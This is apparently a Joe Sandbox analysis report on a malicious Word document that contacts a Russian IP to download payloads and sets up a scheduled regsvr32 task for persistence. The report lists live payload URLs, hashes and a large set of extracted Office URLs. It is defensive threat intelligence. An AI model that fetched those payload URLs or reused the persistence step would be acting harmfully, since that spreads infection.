                            28.2.regsvr32.exe.5b90000.3.unpack100%AviraHEUR/AGEN.1234562Download File

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://roaming.edog.0%URL Reputationsafe
                            https://cdn.entity.0%URL Reputationsafe
                            https://powerlift.acompli.net0%URL Reputationsafe
                            https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                            https://cortana.ai0%URL Reputationsafe
                            https://api.aadrm.com/0%URL Reputationsafe
                            https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
                            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
                            https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                            https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                            https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                            http://www.borland.com/namespaces/Types-IWSDLPublish0%Avira URL Cloudsafe
                            https://store.office.cn/addinstemplate0%URL Reputationsafe
                            https://api.aadrm.com0%URL Reputationsafe
                            http://185.234.247.119/123.RES0%Avira URL Cloudsafe
                            https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                            https://www.odwebp.svc.ms0%URL Reputationsafe
                            https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
                            http://185.234.247.119:80/123.RES0%Avira URL Cloudsafe
                            https://dataservice.o365filtering.com/0%URL Reputationsafe
                            https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                            http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish0%URL Reputationsafe
                            https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                            https://ncus.contentsync.0%URL Reputationsafe
                            https://apis.live.net/v5.0/0%URL Reputationsafe
                            https://wus2.contentsync.0%URL Reputationsafe
                            http://www.borland.com/namespaces/TypesI0%Avira URL Cloudsafe
                            http://www.borland.com/namespaces/TypesU0%URL Reputationsafe
                            https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
                            http://185.234.247.119/1676044147.dat0%Avira URL Cloudsafe
                            http://www.borland.com/namespaces/Types0%URL Reputationsafe
                            http://www.borland.com/namespaces/Typeso0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            No contacted domains info

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://185.234.247.119/123.REStrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://185.234.247.119/1676044147.dattrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.diagnosticssdf.office.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                              		high
                              https://login.microsoftonline.com/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                		high
                                https://shell.suite.office.com:144365C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                  		high
                                  https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Typesexplorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpfalse
                                      		high
                                      https://autodiscover-s.outlook.com/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                        		high
                                        https://roaming.edog.65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                          		high
                                          https://cdn.entity.65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.addins.omex.office.net/appinfo/query65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                            		high
                                            https://clients.config.office.net/user/v1.0/tenantassociationkey65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                              		high
                                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                		high
                                                https://powerlift.acompli.net65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://rpsticket.partnerservices.getmicrosoftkey.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://lookup.onenote.com/lookup/geolocation/v165C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                  		high
                                                  https://cortana.ai65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                    		high
                                                    https://cloudfiles.onenote.com/upload.aspx65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                      		high
                                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                        		high
                                                        https://entitlement.diagnosticssdf.office.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                          		high
                                                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                            		high
                                                            https://api.aadrm.com/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://ofcrecsvcapi-int.azurewebsites.net/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/soap/httpregsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                              		high
                                                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                		high
                                                                https://api.microsoftstream.com/api/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                  		high
                                                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                    		high
                                                                    https://cr.office.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                      		high
                                                                      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://portal.office.com/account/?ref=ClientMeControl65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                        		high
                                                                        https://graph.ppe.windows.net65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                          		high
                                                                          https://res.getmicrosoftkey.com/api/redemptionevents65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://powerlift-frontdesk.acompli.net65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://tasks.office.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                            		high
                                                                            https://officeci.azurewebsites.net/api/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/work65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                              		high
                                                                              http://www.borland.com/namespaces/Types-IWSDLPublishregsvr32.exe, 00000029.00000002.548914112.0000000002FB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://store.office.cn/addinstemplate65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/soap/encoding/regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                		high
                                                                                https://api.aadrm.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                  		high
                                                                                  https://globaldisco.crm.dynamics.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                    		high
                                                                                    https://messaging.engagement.office.com/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                      		high
                                                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                        		high
                                                                                        https://dev0-api.acompli.net/autodetect65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://www.odwebp.svc.ms65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://api.diagnosticssdf.office.com/v2/feedback65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                          		high
                                                                                          https://api.powerbi.com/v1.0/myorg/groups65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                            		high
                                                                                            https://web.microsoftstream.com/video/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                              		high
                                                                                              https://api.addins.store.officeppe.com/addinstemplate65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://185.234.247.119:80/123.RES~WRS{51D44AD9-2EC9-4592-AFD3-FEABD139B753}.tmp.0.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://graph.windows.net65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                		high
                                                                                                https://dataservice.o365filtering.com/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://officesetup.getmicrosoftkey.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublishexplorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://analysis.windows.net/powerbi/api65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                  		high
                                                                                                  https://prod-global-autodetect.acompli.net/autodetect65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://outlook.office365.com/autodiscover/autodiscover.json65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                    		high
                                                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                      		high
                                                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                        		high
                                                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/wsdl/regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                                            		high
                                                                                                            https://ncus.contentsync.65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                              		high
                                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                		high
                                                                                                                http://weather.service.msn.com/data.aspx65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                  		high
                                                                                                                  https://apis.live.net/v5.0/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/wsdl/mime/regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                        		high
                                                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                          		high
                                                                                                                          https://management.azure.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office365.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                              		high
                                                                                                                              https://wus2.contentsync.65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://incidents.diagnostics.office.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                		high
                                                                                                                                http://www.borland.com/namespaces/TypesIregsvr32.exe, 0000001A.00000002.494499846.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://clients.config.office.net/user/v1.0/ios65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                  		high
                                                                                                                                  http://www.borland.com/namespaces/TypesUexplorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://o365auditrealtimeingestion.manage.office.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/soap/envelope/explorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://api.office.net65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://incidents.diagnosticssdf.office.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://asgsmsproxyapi.azurewebsites.net/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/android/policies65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://entitlement.diagnostics.office.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://substrate.office.com/search/api/v2/init65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://outlook.office.com/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/soap/regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://storage.live.com/clientlogs/uploadlocation65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://outlook.office365.com/65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://webshell.suite.office.com65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistory65C14846-0162-44EF-84AC-78ACBBBAB237.0.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://www.borland.com/namespaces/Typesregsvr32.exe, 0000001A.00000002.494499846.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.borland.com/namespaces/Typesoregsvr32.exe, 0000001A.00000002.494499846.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown

                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public IPs

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    185.234.247.119
                                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                                    		198004INTERKONEKT-ASPLtrue

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                                    Analysis ID:640879
                                                                                                                                                                    Start date and time: 07/06/202218:42:452022-06-07 18:42:45 +02:00
                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 13m 40s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:full
                                                                                                                                                                    Sample file name:doc782.docx
                                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                                    Number of analysed new started processes analysed:42
                                                                                                                                                                    Number of new started drivers analysed:1
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • HDC enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.troj.expl.evad.winDOCX@31/32@0/1
                                                                                                                                                                    EGA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    HDC Information:
                                                                                                                                                                    • Successful, ratio: 25.4% (good quality ratio 24.2%)
                                                                                                                                                                    • Quality average: 78.3%
                                                                                                                                                                    • Quality standard deviation: 26.1%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    • Number of executed functions: 109
                                                                                                                                                                    • Number of non-executed functions: 75
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Found application associated with file extension: .docx
                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                                    • Scroll down
                                                                                                                                                                    • Close Viewer

                                                                                                                                                                    Warnings

                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, SgrmBroker.exe, svchost.exe
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.109.76.68, 52.109.12.23, 52.109.76.35, 52.109.12.24, 20.54.89.106, 52.152.110.14, 20.223.24.244, 40.125.122.176
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    18:45:55Task SchedulerRun new task: znkplrgo path: regsvr32.exe s>-s "C:\Users\user\AppData\Local\Temp\t.A"

                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                    IPs

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    185.234.247.119doc782.docxGet hashmaliciousBrowse

                                                                                                                                                                      Domains

                                                                                                                                                                      No context

                                                                                                                                                                      ASNs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      INTERKONEKT-ASPLdoc782.docxGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.119
                                                                                                                                                                      M7AGbBLqPe.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      dAVm0vglvu.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      iWHrAvsZxg.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      pSoGvctFnD.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      mkKVoBF44Y.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      dc5c22ee0782235867ae0363443252f867d0bae4056cd.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      h85KhVVyq2.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      ldpyj89Wrg.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      P56AN03wpC.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      w0B7F0ChKW.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      l4SuvN8suj.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      PBnbTen4kq.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      q1n36V9S8C.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      IhTREoj3J9.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      OYc1IC0G1F.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      wwEndQY5px.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      gdPmlOZz40.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      g3ldHzzdWo.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      OYc1IC0G1F.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      No context

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:Microsoft Access Database
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):528384
                                                                                                                                                                      Entropy (8bit):0.4760941842487876
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:YGfX+h4gDYaJC4O8SFEfZ0jGBcphpWOwtZ1Ih+hVZO4Fg:bfXq9CNHMZS34O/CI
                                                                                                                                                                      MD5:5CA553367250856A875053E7D6EE9B60
                                                                                                                                                                      SHA1:F1CC1EAC7E70329E6CD662D195A2C4506B292460
                                                                                                                                                                      SHA-256:6C9453B9F1865CFEB05E34B19241D6EB26D631705DC676E164C4A128F4E8F531
                                                                                                                                                                      SHA-512:18B517A81A2E9FECA24BEE9AADA8686F31D9F9A9656938A6047F25B1328C0C1420DE30278ECDA90CE16C509ED23475CC232E93E5B57BE9E0BA8F1F7B5893CFBE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N)U.7...i.(...`.:{6Z...Z.C`..3..y[=.|*..|.....Q..n..f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):36
                                                                                                                                                                      Entropy (8bit):2.730660070105504
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                      MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                      SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                      SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                      SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):1.4172860556164644
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:iyFNFaV:iyVu
                                                                                                                                                                      MD5:C20895323FD8135BA643DF30AFE4A176
                                                                                                                                                                      SHA1:0A1B94A5170EEE7F2E1DA2295DBFB584EBC21CBD
                                                                                                                                                                      SHA-256:5C105A8AE43DAC1B3E8293F665DB1D700F983F73FE1D0EB4D97CE8101E7C2957
